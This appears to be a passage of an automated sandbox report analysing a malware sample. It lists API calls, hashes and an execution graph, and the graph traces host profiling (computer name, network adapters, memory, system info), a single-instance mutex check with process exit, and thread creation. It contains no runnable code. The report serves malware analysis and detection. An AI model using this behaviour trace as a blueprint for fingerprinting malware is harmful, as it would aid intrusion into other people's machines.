                          • Opcode Fuzzy Hash: f94e89ed20f696a89cd8f0c6029b3a0babcb809c71abac5e3d9ff9cb2f3ea02a
                          • Instruction Fuzzy Hash: 94D0C776515204DF97007FE6DC58E153FACEA845453915115FC0AC5E44D7319D50DA90
                          Function 7EF683F1 Relevance: 6.3, APIs: 4, Instructions: 338fileCOMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • GetConsoleOutputCP.KERNEL32(1B62296B,?,00000000,?), ref: 7EF68454
                            • Part of subcall function 7EF6439D: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,7EF64226,?,00000000,-00000008), ref: 7EF64449
                          • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 7EF686AF
                          • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 7EF686F7
                          • GetLastError.KERNEL32 ref: 7EF6879A
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                          • String ID:
                          • API String ID: 2112829910-0
                          • Opcode ID: edad1313c08f74db89c2616797f793a2c2e1a7baf28cfc7214189e0a8315c15c
                          • Instruction ID: 9696675af0c087df2c8f77b0d4376e4005d6305020feb17d54d59ceeb5dcd764
                          • Opcode Fuzzy Hash: edad1313c08f74db89c2616797f793a2c2e1a7baf28cfc7214189e0a8315c15c
                          • Instruction Fuzzy Hash: 68D169B9D04298DFCB01CFA9C8A0AADBBB5FF48314F54452EE856EB741D730A942CB50
                          Function 7EF646EF Relevance: 6.1, APIs: 4, Instructions: 82COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 7EF6439D: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,7EF64226,?,00000000,-00000008), ref: 7EF64449
                          • GetLastError.KERNEL32 ref: 7EF64753
                          • __dosmaperr.LIBCMT ref: 7EF6475A
                          • GetLastError.KERNEL32(?,?,?,?), ref: 7EF64794
                          • __dosmaperr.LIBCMT ref: 7EF6479B
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                          • String ID:
                          • API String ID: 1913693674-0
                          • Opcode ID: dc1ed871dfbf9ac26c04cc3db4f8da4cd89ec0dd3101d9be1ccc859e729ca78b
                          • Instruction ID: 503c09ad6161cfc710ea14cb991daec0f136a9bdb936564df216e3cd9d6f8cec
                          • Opcode Fuzzy Hash: dc1ed871dfbf9ac26c04cc3db4f8da4cd89ec0dd3101d9be1ccc859e729ca78b
                          • Instruction Fuzzy Hash: D321C27A604605EFD712BF66DCA091BB7FAFF42264750491AEC16DBE40D730EC408BA0
                          Function 7EF5CB33 Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4853ca264d99ea22a7a761542853db53d2b3b0d03bffc575eedd8ffef691bde9
                          • Instruction ID: 364ce4db3be47c059426aa091e59111fe4bc8cd7a56729d6a283cd2fd8050862
                          • Opcode Fuzzy Hash: 4853ca264d99ea22a7a761542853db53d2b3b0d03bffc575eedd8ffef691bde9
                          • Instruction Fuzzy Hash: 65219F3A204205FFD701AF66DCA4D5A77AABF60264724491AEC17D7B50EB30EC408BB0
                          Function 7EF655FD Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                          Download Yara Rule
                          APIs
                          • GetEnvironmentStringsW.KERNEL32(?,?,?,?,7EF5D839), ref: 7EF65605
                            • Part of subcall function 7EF6439D: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,7EF64226,?,00000000,-00000008), ref: 7EF64449
                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 7EF6563D
                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 7EF6565D
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                          • String ID:
                          • API String ID: 158306478-0
                          • Opcode ID: ab0a959761c6060fc6122f9177811f7425307d173d382299dda7b6d209066516
                          • Instruction ID: 0c162992337fbce9fcbbdf8412155b5c2436ee8143671ff5e187d9c0320ca219
                          • Opcode Fuzzy Hash: ab0a959761c6060fc6122f9177811f7425307d173d382299dda7b6d209066516
                          • Instruction Fuzzy Hash: 2B1126BAA09605FFA31337B24CA9C6F79ACDE591993100826F806F1900FA71CE01C5B1
                          Function 7EF6C3D9 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,7EF6BCF8,?,00000001,?,?,?,7EF687EE,?,?,00000000), ref: 7EF6C3F0
                          • GetLastError.KERNEL32(?,7EF6BCF8,?,00000001,?,?,?,7EF687EE,?,?,00000000,?,?,?,7EF68D75,?), ref: 7EF6C3FC
                            • Part of subcall function 7EF6C3C2: CloseHandle.KERNEL32(FFFFFFFE,7EF6C40C,?,7EF6BCF8,?,00000001,?,?,?,7EF687EE,?,?,00000000,?,?), ref: 7EF6C3D2
                          • ___initconout.LIBCMT ref: 7EF6C40C
                            • Part of subcall function 7EF6C384: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,7EF6C3B3,7EF6BCE5,?,?,7EF687EE,?,?,00000000,?), ref: 7EF6C397
                          • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,7EF6BCF8,?,00000001,?,?,?,7EF687EE,?,?,00000000,?), ref: 7EF6C421
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                          • String ID:
                          • API String ID: 2744216297-0
                          • Opcode ID: c75df84406c6babef11e4f15ca46692d4edcb63b1c74ceff9124048d0d67a260
                          • Instruction ID: 44115409f08bb911d57ec71411a3a7f409b9a045dd71904dab82395325f34332
                          • Opcode Fuzzy Hash: c75df84406c6babef11e4f15ca46692d4edcb63b1c74ceff9124048d0d67a260
                          • Instruction Fuzzy Hash: 19F0C03B540124FBCF126FA6CD19E993F76FB493A1F558452FB5A96920C63388209B90
                          Function 7EF55FE5 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 291COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: __aulldiv
                          • String ID: +$-
                          • API String ID: 3732870572-2137968064
                          • Opcode ID: 2a5dda8db05bb586d1cdf0733098455f9d565910d00a04444795233169bd683b
                          • Instruction ID: be79179cf91c46fb51af8e1c6e10c196cb2da9ee3d87b466c6db1d17515e8895
                          • Opcode Fuzzy Hash: 2a5dda8db05bb586d1cdf0733098455f9d565910d00a04444795233169bd683b
                          • Instruction Fuzzy Hash: 39A1E239A04259DFCF01CE79C8706EE7BB1EF66624F06895AEC729BB85D234D501CB50
                          Function 7EF23D10 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 209COMMON
                          Download Yara Rule
                          APIs
                          • std::exception::exception.LIBCONCRTD ref: 7EF23FC8
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::exception::exception
                          • String ID: parse error$parse_error
                          • API String ID: 2807920213-1820534363
                          • Opcode ID: 433f88c2984f81771743a93f9584c34bf02c72a8679850f823d0fe3979eff282
                          • Instruction ID: f9cbab952c291187051e9d97d82611f04d663974219d12f9f8434e02b8fa296a
                          • Opcode Fuzzy Hash: 433f88c2984f81771743a93f9584c34bf02c72a8679850f823d0fe3979eff282
                          • Instruction Fuzzy Hash: CEA116B8D05258DFDB14CF98D9A0AEEBBB5BF49300F1081AAE559AB740D7306E45CF90
                          Function 7EF511B6 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • EncodePointer.KERNEL32(00000000,?), ref: 7EF511DB
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: EncodePointer
                          • String ID: MOC$RCC
                          • API String ID: 2118026453-2084237596
                          • Opcode ID: d0179208d572197479f9bdbc22ba398a5012ea23949778039e1bc724c4dc83e5
                          • Instruction ID: 6fffc3745253c1e679eeadc9f66e5796f39369f16b9d970cd9982fbeaa7accd1
                          • Opcode Fuzzy Hash: d0179208d572197479f9bdbc22ba398a5012ea23949778039e1bc724c4dc83e5
                          • Instruction Fuzzy Hash: F241593A900A09EFCF02CF94CC90AAE7BB5BF59304F144959E916A6650D335A960DB51
                          Function 7EF07D80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81COMMON
                          Download Yara Rule
                          APIs
                          • std::_Lockit::_Lockit.LIBCPMT ref: 7EF07DA3
                          • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 7EF07E6F
                            • Part of subcall function 7EF4CB02: _Yarn.LIBCPMT ref: 7EF4CB21
                            • Part of subcall function 7EF4CB02: _Yarn.LIBCPMT ref: 7EF4CB45
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
                          • String ID: bad locale name
                          • API String ID: 1908188788-1405518554
                          • Opcode ID: 101fe930c5f6e16c9191cffacb47cdea9874088f6b16e870114b52b5e7d9384a
                          • Instruction ID: fd47ac480c623df95b989434fa4c196e48727cbbc33c90c23a57f94451e834eb
                          • Opcode Fuzzy Hash: 101fe930c5f6e16c9191cffacb47cdea9874088f6b16e870114b52b5e7d9384a
                          • Instruction Fuzzy Hash: CD4136B4D05289DFDB01CF98C950BAEFBF1BF49304F288199D414AB381C77A9A01CBA5

                          Execution Graph

                          Execution Coverage:6%
                          Dynamic/Decrypted Code Coverage:100%
                          Signature Coverage:15.4%
                          Total number of Nodes:1142
                          Total number of Limit Nodes:62
                          execution_graph 43695 7fa78730 43696 7fa78768 43695->43696 43729 7fa8da60 43696->43729 43714 7fa7890a 43841 7faa8560 43714->43841 43718 7fa7891a 43857 7faabc90 GetPEB 43718->43857 43724 7fa78932 43917 7fa90fb0 41 API calls 2 library calls 43724->43917 43726 7fa7893e 43918 7fa90fb0 41 API calls 2 library calls 43726->43918 43728 7fa7894d 43919 7fa92070 43729->43919 43732 7fa77930 43939 7fa65bd0 43732->43939 43735 7faab9a0 43984 7fa81590 43735->43984 43737 7faab9f2 GetPEB 43739 7faaba31 43737->43739 43738 7faab9c3 43738->43737 43988 7fa721c0 43739->43988 43742 7faabbbe 43992 7fa92510 43742->43992 43743 7faabc23 43745 7fa92510 42 API calls 43743->43745 43746 7fa788da 43745->43746 43747 7faa7090 GetPEB 43746->43747 43748 7faa70df 43747->43748 43749 7faa72a9 43748->43749 43750 7faa7250 43748->43750 43752 7fa92510 42 API calls 43749->43752 43751 7fa92510 42 API calls 43750->43751 43753 7fa788e2 43751->43753 43752->43753 43754 7faaa9e0 GetPEB 43753->43754 43755 7faaab46 43754->43755 43756 7faaad7e GetPEB 43755->43756 43757 7faaaf9d GetPEB 43755->43757 43765 7faaadb4 43756->43765 43758 7faab00b 43757->43758 43759 7faab224 GetPEB 43758->43759 43758->43765 43759->43765 43760 7faab434 GetPEB 43766 7faab473 43760->43766 43761 7faab66f 43999 7fa7d800 43761->43999 43764 7faab67c 43764->43764 43767 7fa92510 42 API calls 43764->43767 43765->43760 43765->43766 43766->43761 44003 7fabe725 RaiseException 43766->44003 43768 7faab703 43767->43768 43769 7fa788ea 43768->43769 44004 7fa7e550 44 API calls swprintf 43768->44004 43773 7faa9770 43769->43773 43771 7faab71d 43771->43771 43772 7fa92510 42 API calls 43771->43772 43772->43769 44006 7fa72310 43773->44006 43777 7faa97d2 43778 7faa99a8 43777->43778 43779 7faa9949 43777->43779 44010 7fabb640 72 API calls _fwprintf_s 43778->44010 43782 7fa92510 42 API calls 43779->43782 43781 7faa99b9 43784 7fa92510 42 API calls 43781->43784 43783 7fa788f2 43782->43783 43785 7faa7320 43783->43785 43784->43783 44012 7faace30 43785->44012 43788 7faa7342 43789 7fa92510 42 API calls 43788->43789 43790 7fa788fa 43789->43790 43817 7faa7b60 43790->43817 43791 7faa73af 43792 7faa772b 43791->43792 43795 7faa754b 43791->43795 43793 7faa7769 43792->43793 43794 7faa77d1 43792->43794 43797 7faa77cc 43792->43797 43798 7fa92510 42 API calls 43793->43798 44032 7fa71fe0 43794->44032 44036 7fa721f0 GetPEB 43795->44036 44050 7fa721f0 GetPEB 43797->44050 43798->43797 43802 7faa76be 43804 7fa92510 42 API calls 43802->43804 43804->43790 43805 7faa78f3 44038 7fa916a0 43805->44038 43809 7faa7927 44047 7fabb640 72 API calls _fwprintf_s 43809->44047 43811 7faa793a 43812 7fa92510 42 API calls 43811->43812 43813 7faa799e 43812->43813 44048 7fa91ca0 GetPEB GetPEB 43813->44048 43815 7faa79a7 44049 7fa72280 GetPEB 43815->44049 44076 7fa7f330 43817->44076 43819 7faa7b83 43820 7faa7bb2 GetPEB 43819->43820 43821 7faa7bfe 43820->43821 43822 7faa7e30 43821->43822 43825 7fa92510 42 API calls 43821->43825 44080 7fa7bfc0 43822->44080 43824 7faa7e3d 43826 7faa7e4e GetPEB 43824->43826 43825->43822 43827 7faa7ea5 43826->43827 43828 7faa8075 GetPEB 43827->43828 43830 7faa80a9 43827->43830 43828->43830 44084 7fa808e0 43830->44084 43831 7faa827b 43831->43831 43832 7fa92510 42 API calls 43831->43832 43833 7faa8302 43832->43833 43834 7fa78902 43833->43834 44088 7fa7b7f0 44 API calls swprintf 43833->44088 43838 7faa83b0 GetPEB 43834->43838 43836 7faa831c 43836->43836 43837 7fa92510 42 API calls 43836->43837 43837->43834 43839 7faa83ed GetSystemInfo 43838->43839 43839->43714 44092 7fa7e620 43841->44092 43843 7faa8583 43844 7faa85b2 GetPEB 43843->43844 43845 7faa85f1 43844->43845 43846 7fa721c0 GetPEB 43845->43846 43847 7faa8774 43846->43847 43848 7faa877e 43847->43848 43849 7faa87e6 43847->43849 43851 7fa92510 42 API calls 43848->43851 43850 7fa92510 42 API calls 43849->43850 43852 7fa78912 43850->43852 43851->43852 43853 7faab7c0 GetPEB 43852->43853 43855 7faab807 GlobalMemoryStatusEx 43853->43855 43856 7faab97e __aulldiv 43855->43856 43856->43718 43863 7faabcf0 GetComputerNameExA 43857->43863 43859 7faabe6a 43864 7fa92510 42 API calls 43859->43864 43860 7faabed5 43861 7fa721c0 GetPEB 43860->43861 43862 7faabee5 43861->43862 43866 7faabeef 43862->43866 43867 7faabf57 43862->43867 43863->43859 43863->43860 43865 7fa78922 43864->43865 43870 7faa8860 43865->43870 43868 7fa92510 42 API calls 43866->43868 43869 7fa92510 42 API calls 43867->43869 43868->43865 43869->43865 44097 7fabd920 43870->44097 43874 7faa8e5e 44100 7fa83950 44 API calls swprintf 43874->44100 43875 7faa8ad0 44099 7fa823a0 44 API calls swprintf 43875->44099 43878 7faa8e75 43882 7faa8e86 GetPEB 43878->43882 43879 7faa8add 43881 7faa8aee GetPEB 43879->43881 43880 7faa88e1 GetAdaptersInfo 43880->43874 43880->43875 43884 7faa8bd7 43881->43884 43883 7faa8eed 43882->43883 44101 7fa80c10 44 API calls swprintf 43883->44101 43884->43884 43887 7fa92510 42 API calls 43884->43887 43886 7faa90e9 43888 7faa90fa GetPEB 43886->43888 43889 7fa7892a 43887->43889 43890 7faa9160 43888->43890 43916 7faa9a30 42 API calls 2 library calls 43889->43916 44102 7fa7ffa0 44 API calls swprintf 43890->44102 43892 7faa9383 43893 7faa9394 GetPEB 43892->43893 43894 7faa93fb 43893->43894 44103 7fa72130 GetPEB 43894->44103 43896 7faa95f7 44104 7fa7e370 44 API calls swprintf 43896->44104 43898 7faa9609 44105 7fa71ef0 GetPEB 43898->44105 43900 7faa9631 44106 7fa71ef0 GetPEB 43900->44106 43902 7faa964d 44107 7fa81800 44 API calls swprintf 43902->44107 43904 7faa965f 44108 7fa71ef0 GetPEB 43904->44108 43906 7faa9687 44109 7fa71ef0 GetPEB 43906->44109 43908 7faa96a3 44110 7fa7b720 44 API calls swprintf 43908->44110 43910 7faa96b5 44111 7fa71ef0 GetPEB 43910->44111 43912 7faa96dd 44112 7fabb640 72 API calls _fwprintf_s 43912->44112 43914 7faa96f3 43915 7fa92510 42 API calls 43914->43915 43915->43889 43916->43724 43917->43726 43918->43728 43920 7fa9208d 43919->43920 43921 7fa92092 43919->43921 43928 7fa90cf0 RaiseException Concurrency::cancel_current_task 43920->43928 43923 7fa920a4 43921->43923 43925 7fa920b5 43921->43925 43929 7fa64b60 42 API calls 3 library calls 43923->43929 43926 7fa788be 43925->43926 43930 7fabd43b 43925->43930 43926->43732 43928->43921 43929->43926 43931 7fabd440 _Yarn 43930->43931 43932 7fabd45a 43931->43932 43934 7fabd45c Concurrency::cancel_current_task 43931->43934 43937 7facd006 EnterCriticalSection LeaveCriticalSection std::_Facet_Register 43931->43937 43932->43926 43938 7fabe725 RaiseException 43934->43938 43936 7fabe061 43937->43931 43938->43936 43946 7fa64db0 43939->43946 43948 7fa64dd9 43946->43948 43947 7fa64df7 43957 7fa65010 43947->43957 43948->43947 43949 7fa92070 42 API calls 43948->43949 43955 7fa64e74 43948->43955 43950 7fa64e36 43949->43950 43966 7fa76650 43950->43966 43952 7fa64fea 43970 7fa78ee0 43952->43970 43954 7fa92070 42 API calls 43954->43955 43955->43952 43955->43954 43956 7fa76650 std::ios_base::clear 42 API calls 43955->43956 43956->43955 43958 7fa92070 42 API calls 43957->43958 43959 7fa6505e 43958->43959 43960 7fa78ee0 41 API calls 43959->43960 43961 7fa651fe 43960->43961 43962 7fa79110 43961->43962 43963 7fa65c56 43962->43963 43964 7fa79127 43962->43964 43963->43735 43964->43963 43983 7fa69280 41 API calls 3 library calls 43964->43983 43967 7fa766cc 43966->43967 43974 7fa65580 43967->43974 43969 7fa76711 43969->43955 43971 7fa78f46 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 43970->43971 43972 7fa78f07 43970->43972 43971->43947 43972->43971 43982 7fa8d9b0 41 API calls Concurrency::cancellation_token_source::~cancellation_token_source 43972->43982 43975 7fa65597 numpunct 43974->43975 43977 7fa655a1 std::ios_base::clear 43975->43977 43980 7fa91670 42 API calls numpunct 43975->43980 43979 7fa655ba ctype 43977->43979 43981 7fa64ae0 42 API calls 2 library calls 43977->43981 43979->43969 43980->43977 43981->43979 43982->43971 43983->43964 43985 7fa81661 43984->43985 43987 7fa815dc swprintf 43984->43987 43985->43738 43996 7fabd78c 44 API calls 43987->43996 43989 7fa721de 43988->43989 43990 7fa721cc 43988->43990 43989->43742 43989->43743 43997 7faac370 GetPEB 43990->43997 43993 7fa92560 43992->43993 43994 7fa92524 std::ios_base::clear 43992->43994 43998 7fa69b30 42 API calls 4 library calls 43993->43998 43994->43746 43996->43985 43997->43989 43998->43994 44000 7fa7d8b9 43999->44000 44002 7fa7d834 swprintf 43999->44002 44000->43764 44005 7fabd78c 44 API calls 44002->44005 44003->43761 44004->43771 44005->44000 44007 7fa7232e GetPEB 44006->44007 44008 7fa7231c 44006->44008 44007->43777 44011 7faac370 GetPEB 44008->44011 44010->43781 44011->44007 44013 7faace4f 44012->44013 44051 7fa72010 44013->44051 44018 7faad120 44059 7fa72220 44018->44059 44021 7faad1d7 44067 7fa721f0 GetPEB 44021->44067 44023 7faad332 44025 7faad5dc 44023->44025 44028 7faad49b 44023->44028 44024 7faa7333 44024->43788 44024->43791 44063 7fa71f80 44025->44063 44068 7fa721f0 GetPEB 44028->44068 44030 7faad754 44069 7fa721f0 GetPEB 44030->44069 44033 7fa71fec 44032->44033 44035 7fa71ffe 44032->44035 44074 7faac370 GetPEB 44033->44074 44037 7fa72160 GetPEB 44035->44037 44036->43802 44037->43805 44039 7fa916bd 44038->44039 44040 7fa9171c GetPEB 44039->44040 44041 7fa91793 GetPEB 44040->44041 44043 7fa91a89 44041->44043 44075 7faab7b0 GetPEB 44043->44075 44045 7fa91c45 44046 7fa72070 GetPEB 44045->44046 44046->43809 44047->43811 44048->43815 44049->43797 44050->43790 44052 7fa7202e 44051->44052 44053 7fa7201c 44051->44053 44052->44024 44055 7fa72250 44052->44055 44070 7faac370 GetPEB 44053->44070 44056 7fa7226e CoInitializeSecurity 44055->44056 44057 7fa7225c 44055->44057 44056->44018 44071 7faac370 GetPEB 44057->44071 44060 7fa7223e 44059->44060 44061 7fa7222c 44059->44061 44060->44021 44060->44023 44072 7faac370 GetPEB 44061->44072 44064 7fa71f8c 44063->44064 44066 7fa71f9e CoSetProxyBlanket 44063->44066 44073 7faac370 GetPEB 44064->44073 44066->44024 44066->44030 44067->44024 44068->44024 44069->44024 44070->44052 44071->44056 44072->44060 44073->44066 44074->44035 44075->44045 44077 7fa7f3f9 44076->44077 44079 7fa7f374 swprintf 44076->44079 44077->43819 44089 7fabd78c 44 API calls 44079->44089 44081 7fa7c0a1 44080->44081 44083 7fa7c01c swprintf 44080->44083 44081->43824 44090 7fabd78c 44 API calls 44083->44090 44085 7fa809a1 44084->44085 44087 7fa8091c swprintf 44084->44087 44085->43831 44091 7fabd78c 44 API calls 44087->44091 44088->43836 44089->44077 44090->44081 44091->44085 44093 7fa7e6fd 44092->44093 44095 7fa7e678 swprintf 44092->44095 44093->43843 44096 7fabd78c 44 API calls 44095->44096 44096->44093 44098 7faa886d GetPEB 44097->44098 44098->43880 44099->43879 44100->43878 44101->43886 44102->43892 44103->43896 44104->43898 44105->43900 44106->43902 44107->43904 44108->43906 44109->43908 44110->43910 44111->43912 44112->43914 44113 7fa8963f 44147 7fa646c0 44113->44147 44116 7fa895e0 44116->44113 44117 7fa643b0 84 API calls 44116->44117 44119 7fa6d4a0 42 API calls 44116->44119 44123 7fa795b0 41 API calls 44116->44123 44124 7fa92480 83 API calls Concurrency::cancellation_token_source::~cancellation_token_source 44116->44124 44125 7faa9aa0 84 API calls 44116->44125 44127 7fa95ea0 84 API calls Concurrency::cancellation_token_source::~cancellation_token_source 44116->44127 44128 7fa64850 42 API calls 44116->44128 44131 7faae200 143 API calls 44116->44131 44134 7fa646c0 84 API calls 44116->44134 44139 7fa76650 42 API calls std::ios_base::clear 44116->44139 44143 7fa79520 84 API calls 44116->44143 44144 7fa8c473 Sleep 44116->44144 44146 7fa645d0 84 API calls Concurrency::cancellation_token_source::~cancellation_token_source 44116->44146 44172 7fa99020 69 API calls 2 library calls 44116->44172 44173 7fa9a980 69 API calls 2 library calls 44116->44173 44174 7fa9c2e0 72 API calls 4 library calls 44116->44174 44175 7faa06d0 69 API calls 2 library calls 44116->44175 44176 7fab58e0 50 API calls 3 library calls 44116->44176 44177 7fab6d80 50 API calls 4 library calls 44116->44177 44178 7fa8c820 48 API calls std::ios_base::clear 44116->44178 44179 7fa8c4d0 48 API calls std::ios_base::clear 44116->44179 44180 7fa8d3b0 48 API calls std::ios_base::clear 44116->44180 44181 7fa86bd0 53 API calls std::ios_base::clear 44116->44181 44182 7fa86a20 58 API calls std::ios_base::clear 44116->44182 44183 7fa8cb70 56 API calls 2 library calls 44116->44183 44184 7fa8d230 50 API calls std::ios_base::clear 44116->44184 44185 7fa87690 GetPEB 44116->44185 44186 7fa76a80 44116->44186 44190 7fa7a050 84 API calls Concurrency::cancellation_token_source::~cancellation_token_source 44116->44190 44117->44116 44119->44116 44123->44116 44124->44116 44125->44116 44127->44116 44128->44116 44131->44116 44134->44116 44139->44116 44142 7fa8c236 GetPEB 44142->44116 44143->44116 44144->44116 44146->44116 44148 7fa646e9 44147->44148 44149 7fa6472e 44148->44149 44191 7fa78a10 84 API calls 3 library calls 44148->44191 44153 7fa64754 44149->44153 44154 7fa647a5 44149->44154 44151 7fa64717 44192 7fa92480 44151->44192 44155 7fa76a80 numpunct 42 API calls 44153->44155 44157 7fa76a80 numpunct 42 API calls 44154->44157 44156 7fa64760 44155->44156 44200 7fa6aad0 84 API calls 44156->44200 44160 7fa647b9 44157->44160 44159 7fa64786 44201 7fa91370 44159->44201 44205 7fa64940 42 API calls std::ios_base::clear 44160->44205 44163 7fa6479d 44163->44116 44164 7fa647db 44206 7fa94010 42 API calls 2 library calls 44164->44206 44166 7fa64800 44207 7fabe725 RaiseException 44166->44207 44168 7fa64814 44169 7fa91370 std::ios_base::clear 41 API calls 44168->44169 44170 7fa64820 44169->44170 44171 7fa91370 std::ios_base::clear 41 API calls 44170->44171 44171->44163 44172->44116 44173->44116 44174->44116 44175->44116 44176->44116 44177->44116 44178->44116 44179->44116 44180->44116 44181->44116 44182->44116 44183->44116 44184->44116 44185->44116 44187 7fa76aea 44186->44187 44212 7fa65450 44187->44212 44189 7fa76b21 44189->44116 44190->44142 44191->44151 44193 7fa9248f 44192->44193 44195 7fa924ac 44192->44195 44193->44195 44208 7facbfcd 83 API calls Concurrency::cancellation_token_source::~cancellation_token_source 44193->44208 44194 7fa924d4 44196 7fa924fc 44194->44196 44210 7facbfcd 83 API calls Concurrency::cancellation_token_source::~cancellation_token_source 44194->44210 44195->44194 44209 7facbfcd 83 API calls Concurrency::cancellation_token_source::~cancellation_token_source 44195->44209 44196->44149 44200->44159 44202 7fa9139d 44201->44202 44204 7fa91404 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 44202->44204 44211 7fa8d9b0 41 API calls Concurrency::cancellation_token_source::~cancellation_token_source 44202->44211 44204->44163 44205->44164 44206->44166 44207->44168 44208->44195 44209->44194 44210->44196 44211->44204 44213 7fa65467 numpunct 44212->44213 44216 7fa65471 numpunct 44213->44216 44218 7fa91670 42 API calls numpunct 44213->44218 44215 7fa6548a ctype 44215->44189 44216->44215 44219 7fa64ae0 42 API calls 2 library calls 44216->44219 44218->44216 44219->44215 44220 7fabafe0 44239 7fa87a60 44220->44239 44226 7fabb029 44227 7fabb058 GetPEB 44226->44227 44228 7fabb0a1 44227->44228 44297 7fa87920 CreateMutexA 44228->44297 44231 7fabb258 GetPEB 44236 7fabb30f CreateThread 44231->44236 44232 7fabb250 ExitProcess 44301 7fa72100 44236->44301 44238 7fabb502 44240 7fa87a7f 44239->44240 44306 7fa722b0 44240->44306 44242 7fa87c7f 44244 7fa722b0 GetPEB 44242->44244 44247 7fa87ddc 44244->44247 44246 7fa87f4c 44248 7fa722b0 GetPEB 44246->44248 44247->44246 44319 7fa71f50 GetPEB 44247->44319 44251 7fa880b4 44248->44251 44250 7fa88241 44252 7fa722b0 GetPEB 44250->44252 44251->44250 44320 7fa71f50 GetPEB 44251->44320 44255 7fa88394 44252->44255 44254 7fa884fa 44256 7fa722b0 GetPEB 44254->44256 44255->44254 44321 7fa71f50 GetPEB 44255->44321 44259 7fa8864d 44256->44259 44258 7fa887b3 44260 7fa722b0 GetPEB 44258->44260 44259->44258 44322 7fa71f50 GetPEB 44259->44322 44264 7fa8892d 44260->44264 44262 7fa88a81 44310 7fa7fd90 44262->44310 44264->44262 44323 7fa71f50 GetPEB 44264->44323 44265 7fa88a93 44267 7fa72310 GetPEB 44265->44267 44268 7fa88ab4 44267->44268 44275 7fa88afd 44268->44275 44324 7fa7d490 44 API calls swprintf 44268->44324 44271 7fa88ad5 44325 7fa720d0 GetPEB 44271->44325 44272 7fa88b0f 44273 7fa72310 GetPEB 44272->44273 44276 7fa88b30 44273->44276 44314 7fa803f0 44275->44314 44277 7fa88b79 44276->44277 44326 7fa7b630 44 API calls swprintf 44276->44326 44277->44238 44281 7fa92a30 44277->44281 44279 7fa88b51 44327 7fa720d0 GetPEB 44279->44327 44282 